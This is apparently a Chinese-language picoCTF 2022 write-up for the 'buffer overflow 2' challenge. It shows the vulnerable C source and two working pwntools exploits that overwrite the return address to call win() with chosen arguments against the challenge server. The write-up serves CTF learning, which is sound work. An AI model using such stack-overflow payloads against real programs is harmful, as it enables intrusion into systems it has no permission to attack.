# buffer overflow 2-300pt
[題目在這](https://play.picoctf.org/practice/challenge/259?category=6&originalEvent=70&page=1)
## 題意
## 解題思路
給的 source code 如下:
```C=
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFSIZE 100
#define FLAGSIZE 64
void win(unsigned int arg1, unsigned int arg2) {
char buf[FLAGSIZE];
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("%s %s", "Please create 'flag.txt' in this directory with your",
"own debugging flag.\n");
exit(0);
}
fgets(buf,FLAGSIZE,f);
if (arg1 != 0xCAFEF00D)
return;
if (arg2 != 0xF00DF00D)
return;
printf(buf);
}
void vuln(){
char buf[BUFSIZE];
gets(buf);
puts(buf);
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
gid_t gid = getegid();
setresgid(gid, gid, gid);
puts("Please enter your string: ");
vuln();
return 0;
}
```
如前面的題目一樣要利用 buffer overflow 跳到 win() 裡面拿到 flag,但這次多了 arg1 和 arg2 兩個變數,所以先跳回 main 在塞入 arg1 和 arg2 的值
阿前面步驟跟之前一樣,就不講解了,自己看下面的圖
找到 win() 跟 main() 的 address
簡單的整合
```python=
from pwn import *
b'A'*112+p32(0x8049296)+p32(0x8049372)+p32(0xcafef00d)+p32(0xf00df00d)
```
如果用 code 去跑
```python=
from pwn import *
payload = b'A'*112+p32(0x8049296)+p32(0x8049372)+p32(0xcafef00d)+p32(0xf00df00d)
host = "saturn.picoctf.net"
port = 51315
p = remote(host, port)
#print(p.recvuntil(b'Please enter your string:').decode())
p.sendline(payload)
p.interactive()
p.close()
```
## 解法二
塞到 win() 後,再塞爆 buffer,然後填入 arg1 和 arg2
如果用 code 去跑
```python=
from pwn import *
payload = b'A'*112+p32(0x8049296)+b'B'*4+p32(0xcafef00d)+p32(0xf00df00d)
host = "saturn.picoctf.net"
port = 51315
p = remote(host, port)
#print(p.recvuntil(b'Please enter your string:').decode())
p.sendline(payload)
p.interactive()
p.close()
```
## 困難之處
我第一瞬間想到的是方法一,但地端真的不知道為什麼跑不出 flag 的那個檔案 Orz
第二個方法當然是 google 啊 XD
Date : 2023/05/03
###### tags: `picoCTF2022` `Binary Exploitation` [`從零開始的 picoCTF`](https://hackmd.io/-KQeDuzrQMOcFNhwU_5eKA?both=) `picoCTF`
Sign in with Wallet
Connect another wallet